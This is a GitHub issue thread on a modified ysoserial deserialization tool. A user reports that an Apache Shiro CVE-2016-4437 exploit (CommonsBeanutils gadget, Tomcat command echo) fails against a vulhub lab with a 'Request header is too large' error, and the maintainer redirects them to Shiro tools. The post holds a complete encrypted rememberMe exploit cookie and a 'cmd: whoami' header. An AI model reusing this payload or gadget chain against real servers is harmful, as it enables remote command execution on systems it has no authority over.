search

Y4er / ysoserial

ysoserial修改版,着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。
https://github.com/Y4er/ysoserial/releases
MIT License
625 stars 103 forks source link

Request header is too large #4

Closed maybe-why-not closed 1 year ago

maybe-why-not commented 1 year ago

靶场:https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2016-4437 payload:CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho"

Cookie: rememberMe=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
cmd: whoami

报错:

2023-06-12 08:50:28.457  INFO 35700 --- [nio-8080-exec-8] o.apache.coyote.http11.Http11Processor   : Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

java.lang.IllegalArgumentException: Request header is too large
        at org.apache.coyote.http11.Http11InputBuffer.fill(Http11InputBuffer.java:721) ~[tomcat-embed-core-9.0.29.jar!/:9.0.29]
        at org.apache.coyote.http11.Http11InputBuffer.parseHeader(Http11InputBuffer.java:874) ~[tomcat-embed-core-9.0.29.jar!/:9.0.29]
        at org.apache.coyote.http11.Http11InputBuffer.parseHeaders(Http11InputBuffer.java:564) ~[tomcat-embed-core-9.0.29.jar!/:9.0.29]
        at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:277) ~[tomcat-embed-core-9.0.29.jar!/:9.0.29]
        at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) [tomcat-embed-core-9.0.29.jar!/:9.0.29]
        at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:860) [tomcat-embed-core-9.0.29.jar!/:9.0.29]
        at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1591) [tomcat-embed-core-9.0.29.jar!/:9.0.29]
        at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) [tomcat-embed-core-9.0.29.jar!/:9.0.29]
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [na:1.8.0_221]

        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [na:1.8.0_221]

        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) [tomcat-embed-core-9.0.29.jar!/:9.0.29]
        at java.lang.Thread.run(Thread.java:748) [na:1.8.0_221]
Y4er commented 1 year ago

shiro的问题交给shiro工具处理,我这就是个反序列化工具,不是专门用来搞shiro的工具。